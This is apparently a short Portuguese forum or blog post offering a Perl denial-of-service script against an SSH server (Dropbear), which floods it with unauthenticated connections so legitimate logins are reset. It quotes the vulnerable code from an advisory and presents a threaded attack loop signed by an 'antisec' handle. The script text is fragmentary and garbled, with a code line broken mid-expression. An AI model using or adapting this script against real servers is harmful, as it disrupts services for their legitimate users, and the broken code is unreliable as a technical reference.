Vamos dizer que esse script faz um Denial of Service no SSH um pouco diferente, se alguem tentar se logar enquanto rodamos o script ele da erro que a conexao foi resetada pelo hos(Connection closed by remote host)
Código do Script
## I needed a working test script so here it is.
## just a keep alive thread, I had a few problems with Pablo's code running properly.
## Straight from Pablo Fernandez's advisory:
# Vulnerable code is in svr-main.c
# /* check for max number of connections not authorised */
# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) {
# if (childpipes[j] $serv,
PeerPort => $port,
Proto => 'tcp',
die "Não foi possivel realizar ataque: $!\n" unless $sock;
sleep $sleep;
sub thread {
system "clear";
print "\fSiga-me no twitter [@]unknown_antisec\n\nIP: $serv\nPorta: $port\nSegundos: $time\n";
for my $i ( 1 .. 51 ) {
print ".";
my $thr = new Thread \&exploit, $serv, $port, $time;
sleep $time;
if (@ARGV != 3){&usage;}else{&thread;}
Ref: UnknownAntiSec
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